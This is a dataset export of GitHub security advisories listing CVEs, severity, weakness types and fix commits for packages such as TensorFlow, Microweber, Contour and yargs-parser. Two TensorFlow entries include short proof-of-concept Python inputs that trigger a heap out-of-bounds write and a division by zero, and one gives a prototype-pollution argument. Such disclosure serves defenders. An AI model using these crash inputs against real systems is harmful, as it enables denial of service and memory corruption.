GHSA | GHSA-hxhj-hp9m-qwc4 | Moderate severity vulnerability that affects private_address_check | The private_address_check ruby gem before 0.4.0 is vulnerable to a bypass due to use of Ruby's Resolv.getaddresses method, which is OS-dependent and should not be relied upon for security measures, such as when used to blacklist private network addresses to prevent server-side request forgery. | {'CVE-2017-0904'} | 2021-01-08T18:38:40Z | 2017-11-29T23:21:05Z | MODERATE | 0 | {'CWE-242'} | {'https://edoverflow.com/2017/ruby-resolv-bug/', 'https://github.com/advisories/GHSA-hxhj-hp9m-qwc4', 'https://github.com/jtdowney/private_address_check/issues/1', 'https://hackerone.com/reports/287835', 'https://nvd.nist.gov/vuln/detail/CVE-2017-0904', 'https://hackerone.com/reports/287245', 'https://github.com/jtdowney/private_address_check/commit/58a0d7fe31de339c0117160567a5b33ad82b46af'} | null | {'https://github.com/jtdowney/private_address_check/commit/58a0d7fe31de339c0117160567a5b33ad82b46af'} | {'https://github.com/jtdowney/private_address_check/commit/58a0d7fe31de339c0117160567a5b33ad82b46af'} |
GHSA | GHSA-9w7h-3wwh-6m5q | Cross-site Scripting in Microweber | Microweber prior to 1.2.15 is vulnerable to reflected cross-site scripting on demo.microweber.org/demo/module/. This allows the execution of arbitrary JavaScript as the attacked user. | {'CVE-2022-1439'} | 2022-04-26T13:14:56Z | 2022-04-23T00:03:02Z | MODERATE | 6.3 | {'CWE-79'} | {'https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8', 'https://nvd.nist.gov/vuln/detail/CVE-2022-1439', 'https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0', 'https://github.com/advisories/GHSA-9w7h-3wwh-6m5q'} | null | {'https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8'} | {'https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8'} |
GHSA | GHSA-pvrc-hg3f-58r6 | Heap OOB access in `Dilation2DBackpropInput` | ### Impact
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to `tf.raw_ops.Dilation2DBackpropInput`:
```python
import tensorflow as tf
input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32)
filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32)
out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32)
tf.raw_ops.Dilation2DBackpropInput(
input=input_tensor, filter=filter, out_backprop=out_backprop,
strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/afd954e65f15aea4d438d0a219136fc4a63a573d/tensorflow/core/kernels/dilation_ops.cc#L321-L322) does not validate before writing to the output array.
```cc
in_backprop(b, h_in_max, w_in_max, d) += out_backprop(b, h_out, w_out, d);
```
The values for `h_out` and `w_out` are guaranteed to be in range for `out_backprop` (as they are loop indices bounded by the size of the array). However, there are no similar guarantees relating `h_in_max`/`w_in_max` and `in_backprop`.
### Patches
We have patched the issue in GitHub commit [3f6fe4dfef6f57e768260b48166c27d148f3015f](https://github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team. | {'CVE-2021-29566'} | 2021-05-21T14:25:13Z | 2021-05-21T14:25:13Z | LOW | 2.5 | {'CWE-787'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-pvrc-hg3f-58r6', 'https://github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29566', 'https://github.com/advisories/GHSA-pvrc-hg3f-58r6'} | null | {'https://github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f'} | {'https://github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f'} |
GHSA | GHSA-8rf6-w2mx-4xjh | TODO | ** DISPUTED ** core.py in Mitogen before 0.2.8 has a typo that drops the unidirectional-routing protection mechanism in the case of a child that is initiated by another child. The Ansible extension is unaffected. NOTE: the vendor disputes this issue because it is exploitable only in conjunction with hypothetical other factors, i.e., an affected use case within a library caller, and a bug in the message receiver policy code that led to reliance on this extra protection mechanism. | {'CVE-2019-15149'} | 2021-12-03T14:37:54Z | 2019-08-19T23:45:47Z | CRITICAL | 0 | null | {'https://mitogen.networkgenomics.com/changelog.html#v0-2-8-2019-08-18', 'https://nvd.nist.gov/vuln/detail/CVE-2019-15149', 'https://github.com/advisories/GHSA-8rf6-w2mx-4xjh', 'https://github.com/dw/mitogen/commit/5924af1566763e48c42028399ea0cd95c457b3dc'} | null | {'https://github.com/dw/mitogen/commit/5924af1566763e48c42028399ea0cd95c457b3dc'} | {'https://github.com/dw/mitogen/commit/5924af1566763e48c42028399ea0cd95c457b3dc'} |
GHSA | GHSA-gcvv-gq92-x94r | Authenticated server-side request forgery in file upload via URL. | ### Impact
Authenticated server-side request forgery in file upload via URL.
### Patches
We recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview.
https://www.shopware.com/en/download/#shopware-6
### Workarounds
For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. | {'CVE-2021-37711'} | 2021-08-23T19:42:49Z | 2021-08-23T19:42:49Z | HIGH | 8.8 | {'CWE-918'} | {'https://github.com/shopware/platform/security/advisories/GHSA-gcvv-gq92-x94r', 'https://github.com/advisories/GHSA-gcvv-gq92-x94r', 'https://github.com/shopware/platform/commit/b9f330e652b743dd2374c02bbe68f28b59a3f502', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37711'} | null | {'https://github.com/shopware/platform/commit/b9f330e652b743dd2374c02bbe68f28b59a3f502'} | {'https://github.com/shopware/platform/commit/b9f330e652b743dd2374c02bbe68f28b59a3f502'} |
GHSA | GHSA-c383-q5vf-hx55 | Integer Overflow or Wraparound in Microweber | Microweber prior to 1.2.12 is vulnerable to Integer Overflow or Wraparound. | {'CVE-2022-0913'} | 2022-03-23T15:35:30Z | 2022-03-12T00:00:36Z | HIGH | 7.5 | {'CWE-190'} | {'https://huntr.dev/bounties/f5f3e468-663b-4df0-8340-a2d77e4cc75f', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0913', 'https://github.com/microweber/microweber/commit/7559e141d0707f8eeff2f9aeaa5a0ca2e3fe6583', 'https://github.com/advisories/GHSA-c383-q5vf-hx55'} | null | {'https://github.com/microweber/microweber/commit/7559e141d0707f8eeff2f9aeaa5a0ca2e3fe6583'} | {'https://github.com/microweber/microweber/commit/7559e141d0707f8eeff2f9aeaa5a0ca2e3fe6583'} |
GHSA | GHSA-vwcg-7xqw-qcxw | Heap Overflow in PyMiniRacer | A heap overflow in Sqreen PyMiniRacer (aka Python Mini Racer) before 0.3.0 allows remote attackers to potentially exploit heap corruption.
More details on https://blog.sqreen.com/vulnerability-disclosure-finding-a-vulnerability-in-sqreens-php-agent-and-how-we-fixed-it/. | {'CVE-2020-25489'} | 2021-01-07T22:56:19Z | 2020-09-18T18:03:59Z | MODERATE | 0 | {'CWE-119'} | {'https://github.com/sqreen/PyMiniRacer/compare/v0.2.0...v0.3.0', 'https://github.com/sqreen/PyMiniRacer/commit/627b54768293ec277f1adb997c888ec524f4174d', 'https://blog.sqreen.com/vulnerability-disclosure-finding-a-vulnerability-in-sqreens-php-agent-and-how-we-fixed-it/', 'https://github.com/advisories/GHSA-vwcg-7xqw-qcxw', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25489', 'https://github.com/sqreen/PyMiniRacer/security/advisories/GHSA-vwcg-7xqw-qcxw'} | null | {'https://github.com/sqreen/PyMiniRacer/commit/627b54768293ec277f1adb997c888ec524f4174d'} | {'https://github.com/sqreen/PyMiniRacer/commit/627b54768293ec277f1adb997c888ec524f4174d'} |
GHSA | GHSA-5ph6-qq5x-7jwc | ExternalName Services can be used to gain access to Envoy's admin interface | ### Impact
Josh Ferrell (@josh-ferrell) from VMware has reported that a specially crafted ExternalName type Service may be used to access Envoy's admin interface, which Contour normally prevents from access outside the Envoy container. This can be used to shut down Envoy remotely (a denial of service), or to expose the existence of any Secret that Envoy is using for its configuration, including most notably TLS Keypairs. However, it *cannot* be used to get the *content* of those secrets.
Since this attack allows access to the administration interface, a variety of administration options are available, such as shutting down the Envoy or draining traffic. In general, the Envoy admin interface cannot easily be used for making changes to the cluster, in-flight requests, or backend services, but it could be used to shut down or drain Envoy, change traffic routing, or to retrieve secret metadata, as mentioned above.
### Patches
The issue will be addressed in the forthcoming Contour v1.18.0 and a patch release, v1.17.1, has been released in the meantime.
It is addressed in two ways:
- disabling ExternalName type Services by default
- When ExternalName Services are enabled, block obvious "localhost" entries.
#### Disable ExternalName type Services by default
This change prohibits processing of ExternalName services unless the cluster operator specifically allows them using the new `--enable-externalname` flag or equivalent configuration file setting. This is a breaking change for previous versions of Contour, which is unfortunate, but necessary because of the severity of the information exposed in this advisory.
#### Block obvious `localhost` entries for enabled ExternalName Services
As part of this change set, we have added a filter in the event that operators *do* enable ExternalName Services, such that obvious `localhost` entries are rejected by Contour.
There are a number of problems with this method, however:
- This is a porous control. As long as you control a domain name, it's trivially easy to add a DNS entry for any name you like that redirects to `127.0.0.1` or `::1`. Contour even provides `local.projectcontour.io` ourselves for testing and example purposes. (This name is, of course, included in the "obvious localhost entries" list.) So we can never totally stop this exploit as long as the admin interface is accessible on localhost, which, according to envoyproxy/envoy#2763, will be for some time if not forever. The best we can do is block some obvious elements, but this is always a risk for a motivated attacker.
- We've actually suggested using `localhost` ExternalName Services in the past, to allow people to connect to sidecar External Authentication services in their cluster. Both of these changes break this use-case, but given that it's about something that has security requirements high enough to require authentication, it's important to ensure that people are opting in. For the External Auth sidecar case, we are investigating an update to ExtensionService that will help with the sidecar use case.
### Workarounds
Not easily. It's not possible to control the creation of ExternalName Services with RBAC without the use of Gatekeeper or other form of admission control, and the creation of services is required for Contour to actually work for application developer personas.
### For more information
Exploit code will be published at a later date for this vulnerability, once our users have had a chance to upgrade. | {'CVE-2021-32783'} | 2022-04-19T19:03:04Z | 2021-08-30T17:22:10Z | HIGH | 8.5 | {'CWE-610'} | {'https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32783', 'https://github.com/advisories/GHSA-5ph6-qq5x-7jwc', 'https://github.com/projectcontour/contour/releases/tag/v1.16.1', 'https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc', 'https://github.com/projectcontour/contour/commit/5f3e6d0ab1d48e64bae46400c85c490b200393a3', 'https://github.com/projectcontour/contour/releases/tag/v1.14.2', 'https://github.com/projectcontour/contour/releases/tag/v1.15.2', 'https://github.com/projectcontour/contour/releases/tag/v1.17.1'} | null | {'https://github.com/projectcontour/contour/commit/5f3e6d0ab1d48e64bae46400c85c490b200393a3', 'https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e'} | {'https://github.com/projectcontour/contour/commit/5f3e6d0ab1d48e64bae46400c85c490b200393a3', 'https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e'} |
GHSA | GHSA-w4v7-hwx7-9929 | Cross-site Scripting in tempura | This affects the package tempura before 0.4.0. If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability. | {'CVE-2021-23784'} | 2021-11-08T17:50:10Z | 2021-11-08T17:50:10Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/lukeed/tempura/commit/58a5c3671e2f36b26810e77ead9e0dd471902f9b', 'https://snyk.io/vuln/SNYK-JS-TEMPURA-1569633', 'https://github.com/lukeed/tempura/releases/tag/v0.4.0', 'https://github.com/advisories/GHSA-w4v7-hwx7-9929', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23784'} | null | {'https://github.com/lukeed/tempura/commit/58a5c3671e2f36b26810e77ead9e0dd471902f9b'} | {'https://github.com/lukeed/tempura/commit/58a5c3671e2f36b26810e77ead9e0dd471902f9b'} |
GHSA | GHSA-p9pc-299p-vxgp | Prototype Pollution in yargs-parser | Affected versions of `yargs-parser` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument `--foo.__proto__.bar baz'` adds a `bar` property with value `baz` to all objects. This is only exploitable if attackers have control over the arguments being passed to `yargs-parser`.
## Recommendation
Upgrade to versions 13.1.2, 15.0.1, 18.1.1 or later. | {'CVE-2020-7608'} | 2021-07-28T21:26:25Z | 2020-09-04T18:00:54Z | MODERATE | 5.3 | {'CWE-915'} | {'https://github.com/yargs/yargs-parser/commit/63810ca1ae1a24b08293a4d971e70e058c7a41e2', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7608', 'https://github.com/advisories/GHSA-p9pc-299p-vxgp', 'https://snyk.io/vuln/SNYK-JS-YARGSPARSER-560381', 'https://www.npmjs.com/advisories/1500'} | null | {'https://github.com/yargs/yargs-parser/commit/63810ca1ae1a24b08293a4d971e70e058c7a41e2'} | {'https://github.com/yargs/yargs-parser/commit/63810ca1ae1a24b08293a4d971e70e058c7a41e2'} |
GHSA | GHSA-x7gm-rfgv-w973 | Potential DoS with NumberFilter conversion to integer values. | ### Impact
Automatically generated `NumberFilter` instances, whose value was later converted to an integer, were subject to potential DoS from maliciously input using exponential format with sufficiently large exponents.
### Patches
Version 2.4.0+ applies a `MaxValueValidator` with a a default `limit_value` of 1e50 to the form field used by `NumberFilter` instances.
In addition, `NumberFilter` implements the new `get_max_validator()` which should return a configured validator instance to customise the limit, or else `None` to disable the additional validation.
### Workarounds
Users may manually apply an equivalent validator if they are not able to upgrade.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [the django-filter repo](https://github.com/carltongibson/django-filter)
Thanks to Marcin Waraksa for the report.
| {'CVE-2020-15225'} | 2022-01-06T20:22:26Z | 2020-09-28T19:05:29Z | HIGH | 7.5 | {'CWE-681'} | {'https://github.com/carltongibson/django-filter/commit/340cf7a23a2b3dcd7183f6a0d6c383e85b130d2b', 'https://github.com/carltongibson/django-filter/releases/tag/2.4.0', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DPHENTRHRAYFXYPPBT7JRHZRWILRY44S/', 'https://security.netapp.com/advisory/ntap-20210604-0010/', 'https://github.com/advisories/GHSA-x7gm-rfgv-w973', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FAT2ZAEF6DM3VFSOHKB7X3ASSHGQHJAK/', 'https://github.com/carltongibson/django-filter/security/advisories/GHSA-x7gm-rfgv-w973', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15225', 'https://pypi.org/project/django-filter/'} | null | {'https://github.com/carltongibson/django-filter/commit/340cf7a23a2b3dcd7183f6a0d6c383e85b130d2b'} | {'https://github.com/carltongibson/django-filter/commit/340cf7a23a2b3dcd7183f6a0d6c383e85b130d2b'} |
GHSA | GHSA-3m93-m4q6-mc6v | Inclusion of Sensitive Information in Log Files and Improper Output Neutralization for Logs in Ansible | Ansible, versions 2.9.x before 2.9.1, 2.8.x before 2.8.7 and Ansible versions 2.7.x before 2.7.15, is not respecting the flag no_log set it to True when Sumologic and Splunk callback plugins are used send tasks results events to collectors. This would discloses and collects any sensitive data. | {'CVE-2019-14864'} | 2022-04-25T23:34:51Z | 2020-02-26T19:54:31Z | MODERATE | 6.5 | {'CWE-532'} | {'https://www.debian.org/security/2021/dsa-4950', 'https://github.com/ansible/ansible/commit/75288a89d0053d6df35c90863fb6c9542d89850e', 'https://github.com/ansible/ansible/issues/63522', 'https://github.com/advisories/GHSA-3m93-m4q6-mc6v', 'https://github.com/ansible/ansible/pull/64748', 'https://github.com/ansible/ansible/pull/64273', 'https://nvd.nist.gov/vuln/detail/CVE-2019-14864', 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00021.html', 'https://github.com/ansible/ansible/pull/64274', 'https://github.com/ansible/ansible/pull/63527', 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00026.html', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14864'} | null | {'https://github.com/ansible/ansible/commit/75288a89d0053d6df35c90863fb6c9542d89850e'} | {'https://github.com/ansible/ansible/commit/75288a89d0053d6df35c90863fb6c9542d89850e'} |
GHSA | GHSA-6677-83pp-f862 | Cross-Site Scripting in @nuxt/devalue | Versions of `@nuxt/devalue` prior to 1.2.3 are vulnerable to Cross-Site Scripting. Due to insufficient input sanitization attacker may inject arbitrary JavaScript code through object keys.
## Recommendation
Upgrade to version 1.2.3 or later. | {'CVE-2019-13506'} | 2021-08-17T18:13:30Z | 2019-07-16T00:42:02Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/nuxt/devalue/pull/8', 'https://github.com/advisories/GHSA-6677-83pp-f862', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13506', 'https://github.com/nuxt/nuxt.js/commit/0d5dfe71917191c5b07f373896311f2d8f6b75be', 'https://github.com/Rich-Harris/devalue/issues/19', 'https://github.com/nuxt/nuxt.js/compare/c0776eb...8d14cd4', 'https://www.npmjs.com/advisories/814', 'https://github.com/nuxt/nuxt.js/releases/tag/v2.6.2', 'https://github.com/nuxt/devalue/releases/tag/v1.2.3'} | null | {'https://github.com/nuxt/nuxt.js/commit/0d5dfe71917191c5b07f373896311f2d8f6b75be'} | {'https://github.com/nuxt/nuxt.js/commit/0d5dfe71917191c5b07f373896311f2d8f6b75be'} |
GHSA | GHSA-6f84-42vf-ppwp | Division by 0 in `QuantizedMul` | ### Impact
An attacker can trigger a division by 0 in `tf.raw_ops.QuantizedMul`:
```python
import tensorflow as tf
x = tf.zeros([4, 1], dtype=tf.quint8)
y = tf.constant([], dtype=tf.quint8)
min_x = tf.constant(0.0)
max_x = tf.constant(0.0010000000474974513)
min_y = tf.constant(0.0)
max_y = tf.constant(0.0010000000474974513)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/55900e961ed4a23b438392024912154a2c2f5e85/tensorflow/core/kernels/quantized_mul_op.cc#L188-L198) does a division by a quantity that is controlled by the caller:
```cc
template <class T, class Toutput>
void VectorTensorMultiply(const T* vector_data, int32 vector_offset,
int64 vector_num_elements, const T* tensor_data,
int32 tensor_offset, int64 tensor_num_elements,
Toutput* output) {
for (int i = 0; i < tensor_num_elements; ++i) {
const int64 vector_i = i % vector_num_elements;
...
}
}
```
### Patches
We have patched the issue in GitHub commit [a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6](https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team. | {'CVE-2021-29528'} | 2021-05-21T17:06:47Z | 2021-05-21T14:22:02Z | LOW | 2.5 | {'CWE-369'} | {'https://github.com/advisories/GHSA-6f84-42vf-ppwp', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29528', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6f84-42vf-ppwp', 'https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6'} | null | {'https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6'} | {'https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6'} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.